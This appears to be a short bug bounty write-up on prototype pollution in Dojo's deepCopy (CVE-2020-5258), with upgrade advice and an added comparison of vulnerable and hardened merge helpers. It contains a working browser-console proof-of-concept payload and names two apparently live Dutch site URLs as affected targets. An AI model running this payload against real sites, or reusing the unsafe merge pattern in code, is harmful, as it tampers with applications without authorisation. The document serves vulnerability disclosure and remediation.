Uploaded by damiandamiansuarez

First bug bounty

The deepCopy method in Dojo could be tricked into adding or modifying properties of Object.prototype.

VULNERABILITIES: Outdated and vulnerable components in use, plus prototype pollution (CVE-2020-5258). Apart from dojo.js, the moment.js (2.2.2) and bootstrap (3.4.0) versions in use are outdated and vulnerable, with public exploits available. These two could not be exploited.
IMPACT: Prototype pollution could have significant impacts on the security and functionality of an application. It occurs when an attacker is able to modify the prototype of objects, leading to unintended behaviors and potential security issues. This could lead to Data Manipulation, Property Injection, Denial of Service, Arbitrary Code Execution, Bypassing Security Controls, Spoofing and Tampering, Security Bypass or Cascading Effects.

HOW TO SOLVE IT: Just upgrade Dojo to the latest version. Also upgrade bootstrap & moment.js :)
Open the website and open the developer tools in the browser (Chrome was used): right-click --> Inspect. After that, go to the Console tab and paste the following code:
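require(["dojo/request/util"], function(lang) {
    // JSON.parse creates an own "__proto__" key, which deepCopy then merges into Object.prototype
    var malicious_payload = '{"__proto__":{"vulnerable":"Polluted"}}';
    var a = { b: "c", d: "e" };
    var newObj = lang.deepCopy(a, JSON.parse(malicious_payload));
    // Logs "Polluted" on a vulnerable version: a fresh object inherits the injected property
    console.log({}.vulnerable);
});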
https://www.testuitvoeringarbeidsvoorwaardenwetgeving.nl/mozard/!suite86.scherm0404
https://www.uitvoeringarbeidsvoorwaardenwetgeving.nl/mozard/!suite05.scherm1496?mNch=fy4h66vl8d
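
The merge pattern behind this finding next to a hardened form, as an added example that is not part of the original report and is not Dojo's source code. The helper names unsafeDeepCopy and safeDeepCopy and the extra key "b" are constructed for illustration; the payload shape is the one used above.

```javascript
// Added example: simplified merge helpers, not Dojo's source code.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);
const isObj = (v) => v !== null && typeof v === "object";

// Vulnerable pattern: walks every key and reads target[name] through the
// prototype chain, so target["__proto__"] resolves to Object.prototype.
function unsafeDeepCopy(target, source) {
  for (const name in source) {
    const tval = target[name];
    const sval = source[name];
    if (isObj(tval) && isObj(sval)) {
      unsafeDeepCopy(tval, sval);
    } else {
      target[name] = sval;
    }
  }
  return target;
}

// Hardened pattern: own keys only, prototype-related keys skipped, and
// recursion only into objects the target itself owns.
function safeDeepCopy(target, source) {
  for (const name of Object.keys(source)) {
    if (BLOCKED_KEYS.has(name)) continue;
    const sval = source[name];
    if (!isObj(sval)) { target[name] = sval; continue; }
    const own = Object.prototype.hasOwnProperty.call(target, name);
    const tval = own && isObj(target[name]) ? target[name] : (Array.isArray(sval) ? [] : {});
    target[name] = safeDeepCopy(tval, sval);
  }
  return target;
}

// Runs both helpers on the payload shape from the report and records what a
// fresh object inherits afterwards. The key "b" is a constructed addition.
function demo() {
  const payload = '{"__proto__":{"vulnerable":"Polluted"},"b":"x"}';
  const out = {};
  out.merged = safeDeepCopy({ b: "c", d: "e" }, JSON.parse(payload));
  out.afterSafe = {}.vulnerable;        // prototype untouched
  unsafeDeepCopy({ b: "c", d: "e" }, JSON.parse(payload));
  out.afterUnsafe = {}.vulnerable;      // prototype polluted
  delete Object.prototype.vulnerable;   // undo the pollution
  out.afterCleanup = {}.vulnerable;
  return out;
}

console.log(demo());
```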